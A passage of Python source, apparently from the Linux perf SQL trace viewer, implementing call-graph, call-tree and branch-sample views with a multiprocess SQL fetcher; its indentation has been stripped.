super(CallGraphLevelTwoItem, self).__init__(glb, row, comm_id, thread_id, 1, 0, 0, parent_item)
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallGraphLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Context-sensitive call graph data model level one item
class CallGraphLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, comm, parent_item):
super(CallGraphLevelOneItem, self).__init__(glb, row, parent_item)
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True;
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallGraphLevelTwoItem(self.glb, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model root item
class CallGraphRootItem(CallGraphLevelItemBase):
def __init__(self, glb):
super(CallGraphRootItem, self).__init__(glb, 0, None)
self.dbid = 0
self.query_done = True;
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms")
while query.next():
if not query.value(0):
continue
child_item = CallGraphLevelOneItem(glb, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model base
class CallGraphModelBase(TreeModel):
def __init__(self, glb, parent=None):
super(CallGraphModelBase, self).__init__(glb, parent)
def FindSelect(self, value, pattern, query):
if pattern:
# postgresql and sqlite pattern patching differences:
# postgresql LIKE is case sensitive but sqlite LIKE is not
# postgresql LIKE allows % and _ to be escaped with \ but sqlite LIKE does not
# postgresql supports ILIKE which is case insensitive
# sqlite supports GLOB (text only) which uses * and ? and is case sensitive
if not self.glb.dbref.is_sqlite3:
# Escape % and _
s = value.replace("%", "\%")
s = s.replace("_", "\_")
# Translate * and ? into SQL LIKE pattern characters % and _
trans = string.maketrans("*?", "%_")
match = " LIKE '" + str(s).translate(trans) + "'"
else:
match = " GLOB '" + str(value) + "'"
else:
match = " = '" + str(value) + "'"
self.DoFindSelect(query, match)
def Found(self, query, found):
if found:
return self.FindPath(query)
return []
def FindValue(self, value, pattern, query, last_value, last_pattern):
if last_value == value and pattern == last_pattern:
found = query.first()
else:
self.FindSelect(value, pattern, query)
found = query.next()
return self.Found(query, found)
def FindNext(self, query):
found = query.next()
if not found:
found = query.first()
return self.Found(query, found)
def FindPrev(self, query):
found = query.previous()
if not found:
found = query.last()
return self.Found(query, found)
def FindThread(self, c):
if c.direction == 0 or c.value != c.last_value or c.pattern != c.last_pattern:
ids = self.FindValue(c.value, c.pattern, c.query, c.last_value, c.last_pattern)
elif c.direction > 0:
ids = self.FindNext(c.query)
else:
ids = self.FindPrev(c.query)
return (True, ids)
def Find(self, value, direction, pattern, context, callback):
class Context():
def __init__(self, *x):
self.value, self.direction, self.pattern, self.query, self.last_value, self.last_pattern = x
def Update(self, *x):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = x + (self.value, self.pattern)
if len(context):
context[0].Update(value, direction, pattern)
else:
context.append(Context(value, direction, pattern, QSqlQuery(self.glb.db), None, None))
# Use a thread so the UI is not blocked during the SELECT
thread = Thread(self.FindThread, context[0])
thread.done.connect(lambda ids, t=thread, c=callback: self.FindDone(t, c, ids), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, ids):
callback(ids)
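# Sketch of the wildcard translation described in FindSelect above
# (illustration only; the function name is hypothetical): user patterns use *
# and ?; for PostgreSQL they become a LIKE clause with % and _ (literal % and
# _ escaped), while for SQLite the pattern is passed to GLOB unchanged.
def WildcardToMatchClause(value, is_sqlite3):
	if is_sqlite3:
		return " GLOB '" + str(value) + "'"
	s = str(value).replace("%", "\\%").replace("_", "\\_")
	trans = string.maketrans("*?", "%_") # Python 2 string module, as used above
	return " LIKE '" + s.translate(trans) + "'"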
# Context-sensitive call graph data model
class CallGraphModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallGraphModel, self).__init__(glb, parent)
def GetRoot(self):
return CallGraphRootItem(self.glb)
def columnCount(self, parent=None):
return 7
def columnHeader(self, column):
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT call_path_id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" GROUP BY comm_id, thread_id, call_path_id"
" ORDER BY comm_id, thread_id, call_path_id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM call_paths"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
# The call path root is not used
if ids[0] == 1:
del ids[0]
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Call tree data model level 2+ item base
class CallTreeLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, thread_id, calls_id, time, branch_count, parent_item):
super(CallTreeLevelTwoPlusItemBase, self).__init__(glb, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.calls_id = calls_id
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True;
if self.calls_id == 0:
comm_thread = " AND comm_id = " + str(self.comm_id) + " AND thread_id = " + str(self.thread_id)
else:
comm_thread = ""
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT calls.id, name, short_name, call_time, return_time - call_time, branch_count"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE calls.parent_id = " + str(self.calls_id) + comm_thread +
" ORDER BY call_time, calls.id")
while query.next():
child_item = CallTreeLevelThreeItem(self.glb, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), int(query.value(5)), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model level three item
class CallTreeLevelThreeItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, calls_id, name, dso, count, time, branch_count, parent_item):
super(CallTreeLevelThreeItem, self).__init__(glb, row, comm_id, thread_id, calls_id, time, branch_count, parent_item)
dso = dsoname(dso)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = calls_id
# Call tree data model level two item
class CallTreeLevelTwoItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, pid, tid, parent_item):
super(CallTreeLevelTwoItem, self).__init__(glb, row, comm_id, thread_id, 0, 0, 0, parent_item)
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallTreeLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Call tree data model level one item
class CallTreeLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, comm, parent_item):
super(CallTreeLevelOneItem, self).__init__(glb, row, parent_item)
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True;
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallTreeLevelTwoItem(self.glb, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model root item
class CallTreeRootItem(CallGraphLevelItemBase):
def __init__(self, glb):
super(CallTreeRootItem, self).__init__(glb, 0, None)
self.dbid = 0
self.query_done = True;
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms")
while query.next():
if not query.value(0):
continue
child_item = CallTreeLevelOneItem(glb, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call Tree data model
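# Unlike the call graph model above, the call tree model does not aggregate
# calls: each row is an individual call.  Consequently Find results are
# located by walking the calls table's parent_id chain (rather than
# call_paths), prefixed with the comm and thread ids so the view can walk
# down to the matching row.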
class CallTreeModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallTreeModel, self).__init__(glb, parent)
def GetRoot(self):
return CallTreeRootItem(self.glb)
def columnCount(self, parent=None):
return 7
def columnHeader(self, column):
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT calls.id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" ORDER BY comm_id, thread_id, call_time, calls.id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM calls"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Vertical widget layout
class VBox():
def __init__(self, w1, w2, w3=None):
self.vbox = QWidget()
self.vbox.setLayout(QVBoxLayout());
self.vbox.layout().setContentsMargins(0, 0, 0, 0)
self.vbox.layout().addWidget(w1)
self.vbox.layout().addWidget(w2)
if w3:
self.vbox.layout().addWidget(w3)
def Widget(self):
return self.vbox
# Tree window base
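# Shared behaviour for the call graph and call tree windows.  DisplayFound()
# takes the list of ids that the model's FindPath() builds and walks down the
# tree one level per id, making the child whose dbid matches the current
# index, so the view ends up positioned on the found item; it returns False
# if any level has no match.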
class TreeWindowBase(QMdiSubWindow):
def __init__(self, parent=None):
super(TreeWindowBase, self).__init__(parent)
self.model = None
self.find_bar = None
self.view = QTreeView()
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.context_menu = TreeContextMenu(self.view)
def DisplayFound(self, ids):
if not len(ids):
return False
parent = QModelIndex()
for dbid in ids:
found = False
n = self.model.rowCount(parent)
for row in xrange(n):
child = self.model.index(row, 0, parent)
if child.internalPointer().dbid == dbid:
found = True
self.view.setCurrentIndex(child)
parent = child
break
if not found:
break
return found
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.model.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, ids):
found = True
if not self.DisplayFound(ids):
found = False
self.find_bar.Idle()
if not found:
self.find_bar.NotFound()
# Context-sensitive call graph window
class CallGraphWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallGraphWindow, self).__init__(parent)
self.model = LookupCreateModel("Context-Sensitive Call Graph", lambda x=glb: CallGraphModel(x))
self.view.setModel(self.model)
for c, w in ((0, 250), (1, 100), (2, 60), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Context-Sensitive Call Graph")
# Call tree window
class CallTreeWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallTreeWindow, self).__init__(parent)
self.model = LookupCreateModel("Call Tree", lambda x=glb: CallTreeModel(x))
self.view.setModel(self.model)
for c, w in ((0, 230), (1, 100), (2, 100), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Call Tree")
# Child data item finder
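# Simple find for flat models (branches, tables, top calls).  It scans only
# the rows that have already been fetched, matching either a substring or,
# in pattern mode, a Python regular expression against every column.  The
# list of matching rows is cached until the value or mode changes; direction
# 0 restarts from the first match, +/-1 steps through the matches with
# wrap-around.  The scan runs on a worker Thread so the UI stays responsive,
# and the callback receives the matching row number or -1.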
class ChildDataItemFinder():
def __init__(self, root):
self.root = root
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (None,) * 5
self.rows = []
self.pos = 0
def FindSelect(self):
self.rows = []
if self.pattern:
pattern = re.compile(self.value)
for child in self.root.child_items:
for column_data in child.data:
if re.search(pattern, str(column_data)) is not None:
self.rows.append(child.row)
break
else:
for child in self.root.child_items:
for column_data in child.data:
if self.value in str(column_data):
self.rows.append(child.row)
break
def FindValue(self):
self.pos = 0
if self.last_value != self.value or self.pattern != self.last_pattern:
self.FindSelect()
if not len(self.rows):
return -1
return self.rows[self.pos]
def FindThread(self):
if self.direction == 0 or self.value != self.last_value or self.pattern != self.last_pattern:
row = self.FindValue()
elif len(self.rows):
if self.direction > 0:
self.pos += 1
if self.pos >= len(self.rows):
self.pos = 0
else:
self.pos -= 1
if self.pos < 0:
self.pos = len(self.rows) - 1
row = self.rows[self.pos]
else:
row = -1
return (True, row)
def Find(self, value, direction, pattern, context, callback):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (value, direction,pattern, self.value, self.pattern)
# Use a thread so the UI is not blocked
thread = Thread(self.FindThread)
thread.done.connect(lambda row, t=thread, c=callback: self.FindDone(t, c, row), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, row):
callback(row)
# Number of database records to fetch in one go
glb_chunk_sz = 10000
# Background process for SQL data fetcher
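# Runs in a separate process (see SQLFetcherFn) and feeds rows to the GUI
# through a shared-memory ring buffer.  Each prepared row is pickled and
# written after a fixed-size pickled length prefix of glb_nsz bytes; a
# pickled length of zero marks the point where the writer wrapped back to
# the start of the buffer.  'head' and 'tail' index the buffer,
# 'process_target' is the total number of rows wanted (negative means shut
# down), 'wait_event' wakes the process when the target grows or buffer
# space is freed, and 'fetched_event' tells the GUI side that 'fetch_count'
# has advanced.  Queries containing "$$last_id$$" are re-issued with the
# last fetched id substituted (keyset pagination); otherwise the query is
# executed only once.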
class SQLFetcherProcess():
def __init__(self, dbref, sql, buffer, head, tail, fetch_count, fetching_done, process_target, wait_event, fetched_event, prep):
# Need a unique connection name
conn_name = "SQLFetcher" + str(os.getpid())
self.db, dbname = dbref.Open(conn_name)
self.sql = sql
self.buffer = buffer
self.head = head
self.tail = tail
self.fetch_count = fetch_count
self.fetching_done = fetching_done
self.process_target = process_target
self.wait_event = wait_event
self.fetched_event = fetched_event
self.prep = prep
self.query = QSqlQuery(self.db)
self.query_limit = 0 if "$$last_id$$" in sql else 2
self.last_id = -1
self.fetched = 0
self.more = True
self.local_head = self.head.value
self.local_tail = self.tail.value
def Select(self):
if self.query_limit:
if self.query_limit == 1:
return
self.query_limit -= 1
stmt = self.sql.replace("$$last_id$$", str(self.last_id))
QueryExec(self.query, stmt)
def Next(self):
if not self.query.next():
self.Select()
if not self.query.next():
return None
self.last_id = self.query.value(0)
return self.prep(self.query)
def WaitForTarget(self):
while True:
self.wait_event.clear()
target = self.process_target.value
if target > self.fetched or target < 0:
break
self.wait_event.wait()
return target
def HasSpace(self, sz):
if self.local_tail <= self.local_head:
space = len(self.buffer) - self.local_head
if space > sz:
return True
if space >= glb_nsz:
# Use 0 (or space < glb_nsz) to mean there is no more at the top of the buffer
nd = pickle.dumps(0, pickle.HIGHEST_PROTOCOL)
self.buffer[self.local_head : self.local_head + len(nd)] = nd
self.local_head = 0
if self.local_tail - self.local_head > sz:
return True
return False
def WaitForSpace(self, sz):
if self.HasSpace(sz):
return
while True:
self.wait_event.clear()
self.local_tail = self.tail.value
if self.HasSpace(sz):
return
self.wait_event.wait()
def AddToBuffer(self, obj):
d = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
n = len(d)
nd = pickle.dumps(n, pickle.HIGHEST_PROTOCOL)
sz = n + glb_nsz
self.WaitForSpace(sz)
pos = self.local_head
self.buffer[pos : pos + len(nd)] = nd
self.buffer[pos + glb_nsz : pos + sz] = d
self.local_head += sz
def FetchBatch(self, batch_size):
fetched = 0
while batch_size > fetched:
obj = self.Next()
if obj is None:
self.more = False
break
self.AddToBuffer(obj)
fetched += 1
if fetched:
self.fetched += fetched
with self.fetch_count.get_lock():
self.fetch_count.value += fetched
self.head.value = self.local_head
self.fetched_event.set()
def Run(self):
while self.more:
target = self.WaitForTarget()
if target < 0:
break
batch_size = min(glb_chunk_sz, target - self.fetched)
self.FetchBatch(batch_size)
self.fetching_done.value = True
self.fetched_event.set()
def SQLFetcherFn(*x):
process = SQLFetcherProcess(*x)
process.Run()
# SQL data fetcher
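# GUI-side counterpart of SQLFetcherProcess.  Fetch(nr) raises the shared
# target so the background process produces more rows.  A helper Thread
# blocks until 'fetch_count' advances, then ProcessData() (run on the main
# thread via a queued connection) unpickles that many rows from the ring
# buffer, hands each one to 'process_data', publishes the new tail so the
# producer can reuse the space, and emits 'done' with the row count.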
class SQLFetcher(QObject):
done = Signal(object)
def __init__(self, glb, sql, prep, process_data, parent=None):
super(SQLFetcher, self).__init__(parent)
self.process_data = process_data
self.more = True
self.target = 0
self.last_target = 0
self.fetched = 0
self.buffer_size = 16 * 1024 * 1024
self.buffer = Array(c_char, self.buffer_size, lock=False)
self.head = Value(c_longlong)
self.tail = Value(c_longlong)
self.local_tail = 0
self.fetch_count = Value(c_longlong)
self.fetching_done = Value(c_bool)
self.last_count = 0
self.process_target = Value(c_longlong)
self.wait_event = Event()
self.fetched_event = Event()
glb.AddInstanceToShutdownOnExit(self)
self.process = Process(target=SQLFetcherFn, args=(glb.dbref, sql, self.buffer, self.head, self.tail, self.fetch_count, self.fetching_done, self.process_target, self.wait_event, self.fetched_event, prep))
self.process.start()
self.thread = Thread(self.Thread)
self.thread.done.connect(self.ProcessData, Qt.QueuedConnection)
self.thread.start()
def Shutdown(self):
# Tell the thread and process to exit
self.process_target.value = -1
self.wait_event.set()
self.more = False
self.fetching_done.value = True
self.fetched_event.set()
def Thread(self):
if not self.more:
return True, 0
while True:
self.fetched_event.clear()
fetch_count = self.fetch_count.value
if fetch_count != self.last_count:
break
if self.fetching_done.value:
self.more = False
return True, 0
self.fetched_event.wait()
count = fetch_count - self.last_count
self.last_count = fetch_count
self.fetched += count
return False, count
def Fetch(self, nr):
if not self.more:
# -1 indicates there are no more
return -1
result = self.fetched
extra = result + nr - self.target
if extra > 0:
self.target += extra
# process_target < 0 indicates shutting down
if self.process_target.value >= 0:
self.process_target.value = self.target
self.wait_event.set()
return result
def RemoveFromBuffer(self):
pos = self.local_tail
if len(self.buffer) - pos < glb_nsz:
pos = 0
n = pickle.loads(self.buffer[pos : pos + glb_nsz])
if n == 0:
pos = 0
n = pickle.loads(self.buffer[0 : glb_nsz])
pos += glb_nsz
obj = pickle.loads(self.buffer[pos : pos + n])
self.local_tail = pos + n
return obj
def ProcessData(self, count):
for i in xrange(count):
obj = self.RemoveFromBuffer()
self.process_data(obj)
self.tail.value = self.local_tail
self.wait_event.set()
self.done.emit(count)
# Fetch more records bar
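# The bar shown under branch and table views.  The spin box chooses how many
# chunks of glb_chunk_sz records to request, the model's 'progress' signal
# drives the progress bar as rows arrive, and a progress value of zero is the
# model's way of saying there are no more records, which switches the bar to
# its "All records fetched" state.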
class FetchMoreRecordsBar():
def __init__(self, model, parent):
self.model = model
self.label = QLabel("Number of records (x " + "{:,}".format(glb_chunk_sz) + ") to fetch:")
self.label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch_count = QSpinBox()
self.fetch_count.setRange(1, 1000000)
self.fetch_count.setValue(10)
self.fetch_count.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch = QPushButton("Go!")
self.fetch.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch.released.connect(self.FetchMoreRecords)
self.progress = QProgressBar()
self.progress.setRange(0, 100)
self.progress.hide()
self.done_label = QLabel("All records fetched")
self.done_label.hide()
self.spacer = QLabel("")
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(self.label)
self.hbox.addWidget(self.fetch_count)
self.hbox.addWidget(self.fetch)
self.hbox.addWidget(self.spacer)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.done_label)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox);
self.bar.show()
self.in_progress = False
self.model.progress.connect(self.Progress)
self.done = False
if not model.HasMoreRecords():
self.Done()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.fetch.setFocus()
def Deactivate(self):
self.bar.hide()
def Enable(self, enable):
self.fetch.setEnabled(enable)
self.fetch_count.setEnabled(enable)
def Busy(self):
self.Enable(False)
self.fetch.hide()
self.spacer.hide()
self.progress.show()
def Idle(self):
self.in_progress = False
self.Enable(True)
self.progress.hide()
self.fetch.show()
self.spacer.show()
def Target(self):
return self.fetch_count.value() * glb_chunk_sz
def Done(self):
self.done = True
self.Idle()
self.label.hide()
self.fetch_count.hide()
self.fetch.hide()
self.spacer.hide()
self.done_label.show()
def Progress(self, count):
if self.in_progress:
if count:
percent = ((count - self.start) * 100) / self.Target()
if percent >= 100:
self.Idle()
else:
self.progress.setValue(percent)
if not count:
# Count value of zero means no more records
self.Done()
def FetchMoreRecords(self):
if self.done:
return
self.progress.setValue(0)
self.Busy()
self.in_progress = True
self.start = self.model.FetchMoreRecords(self.Target())
# Branch data model level two item
class BranchLevelTwoItem():
def __init__(self, row, text, parent_item):
self.row = row
self.parent_item = parent_item
self.data = [""] * 8
self.data[7] = text
self.level = 2
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
return 0
def hasChildren(self):
return False
def getData(self, column):
return self.data[column]
# Branch data model level one item
class BranchLevelOneItem():
def __init__(self, glb, row, data, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.child_count = 0
self.child_items = []
self.data = data[1:]
self.dbid = data[0]
self.level = 1
self.query_done = False
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def Select(self):
self.query_done = True
if not self.glb.have_disassembler:
return
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT cpu, to_dso_id, to_symbol_id, to_sym_offset, short_name, long_name, build_id, sym_start, to_ip"
" FROM samples"
" INNER JOIN dsos ON samples.to_dso_id = dsos.id"
" INNER JOIN symbols ON samples.to_symbol_id = symbols.id"
" WHERE samples.id = " + str(self.dbid))
if not query.next():
return
cpu = query.value(0)
dso = query.value(1)
sym = query.value(2)
if dso == 0 or sym == 0:
return
off = query.value(3)
short_name = query.value(4)
long_name = query.value(5)
build_id = query.value(6)
sym_start = query.value(7)
ip = query.value(8)
QueryExec(query, "SELECT samples.dso_id, symbol_id, sym_offset, sym_start"
" FROM samples"
" INNER JOIN symbols ON samples.symbol_id = symbols.id"
" WHERE samples.id > " + str(self.dbid) + " AND cpu = " + str(cpu) +
" ORDER BY samples.id"
" LIMIT 1")
if not query.next():
return
if query.value(0) != dso:
# Cannot disassemble from one dso to another
return
bsym = query.value(1)
boff = query.value(2)
bsym_start = query.value(3)
if bsym == 0:
return
tot = bsym_start + boff + 1 - sym_start - off
if tot <= 0 or tot > 16384:
return
inst = self.glb.disassembler.Instruction()
f = self.glb.FileFromNamesAndBuildId(short_name, long_name, build_id)
if not f:
return
mode = 0 if Is64Bit(f) else 1
self.glb.disassembler.SetMode(inst, mode)
buf_sz = tot + 16
buf = create_string_buffer(tot + 16)
f.seek(sym_start + off)
buf.value = f.read(buf_sz)
buf_ptr = addressof(buf)
i = 0
while tot > 0:
cnt, text = self.glb.disassembler.DisassembleOne(inst, buf_ptr, buf_sz, ip)
if cnt:
byte_str = tohex(ip).rjust(16)
for k in xrange(cnt):
byte_str += " %02x" % ord(buf[i])
i += 1
while k < 15:
byte_str += " "
k += 1
self.child_items.append(BranchLevelTwoItem(0, byte_str + " " + text, self))
self.child_count += 1
else:
return
buf_ptr += cnt
tot -= cnt
buf_sz -= cnt
ip += cnt
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Branch data model root item
class BranchRootItem():
def __init__(self):
self.child_count = 0
self.child_items = []
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return None
def getRow(self):
return 0
def childCount(self):
return self.child_count
def hasChildren(self):
return self.child_count > 0
def getData(self, column):
return ""
# Branch data preparation
def BranchDataPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
return data
def BranchDataPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
return data
# Branch data model
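# Branch (sample) rows are fetched in chunks of glb_chunk_sz via SQLFetcher,
# using "samples.id > $$last_id$$" so each chunk continues where the last one
# ended, filtered by event id and any report WHERE clause.  Under PySide
# version 1 on Python 3 the time column is formatted as a string
# (BranchDataPrepWA) to work around large-integer handling.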
class BranchModel(TreeModel):
progress = Signal(object)
def __init__(self, glb, event_id, where_clause, parent=None):
super(BranchModel, self).__init__(glb, parent)
self.event_id = event_id
self.more = True
self.populated = 0
sql = ("SELECT samples.id, time, cpu, comm, pid, tid, branch_types.name,"
" CASE WHEN in_tx = '0' THEN 'No' ELSE 'Yes' END,"
" ip, symbols.name, sym_offset, dsos.short_name,"
" to_ip, to_symbols.name, to_sym_offset, to_dsos.short_name"
" FROM samples"
" INNER JOIN comms ON comm_id = comms.id"
" INNER JOIN threads ON thread_id = threads.id"
" INNER JOIN branch_types ON branch_type = branch_types.id"
" INNER JOIN symbols ON symbol_id = symbols.id"
" INNER JOIN symbols to_symbols ON to_symbol_id = to_symbols.id"
" INNER JOIN dsos ON samples.dso_id = dsos.id"
" INNER JOIN dsos AS to_dsos ON samples.to_dso_id = to_dsos.id"
" WHERE samples.id > $$last_id$$" + where_clause +
" AND evsel_id = " + str(self.event_id) +
" ORDER BY samples.id"
" LIMIT " + str(glb_chunk_sz))
if pyside_version_1 and sys.version_info[0] == 3:
prep = BranchDataPrepWA
else:
prep = BranchDataPrep
self.fetcher = SQLFetcher(glb, sql, prep, self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def GetRoot(self):
return BranchRootItem()
def columnCount(self, parent=None):
return 8
def columnHeader(self, column):
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Branch")[column]
def columnFont(self, column):
if column != 7:
return None
return QFont("Monospace")
def DisplayData(self, item, index):
if item.level == 1:
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = BranchLevelOneItem(self.glb, self.populated, data, self.root)
self.root.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.root.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.root.child_count += count
self.endInsertRows()
self.progress.emit(self.root.child_count)
def FetchMoreRecords(self, count):
current = self.root.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
# Report Variables
class ReportVars():
def __init__(self, name = "", where_clause = "", limit = ""):
self.name = name
self.where_clause = where_clause
self.limit = limit
def UniqueId(self):
return str(self.where_clause + ";" + self.limit)
# Branch window
class BranchWindow(QMdiSubWindow):
def __init__(self, glb, event_id, report_vars, parent=None):
super(BranchWindow, self).__init__(parent)
model_name = "Branch Events " + str(event_id) + " " + report_vars.UniqueId()
self.model = LookupCreateModel(model_name, lambda: BranchModel(glb, event_id, report_vars.where_clause))
self.view = QTreeView()
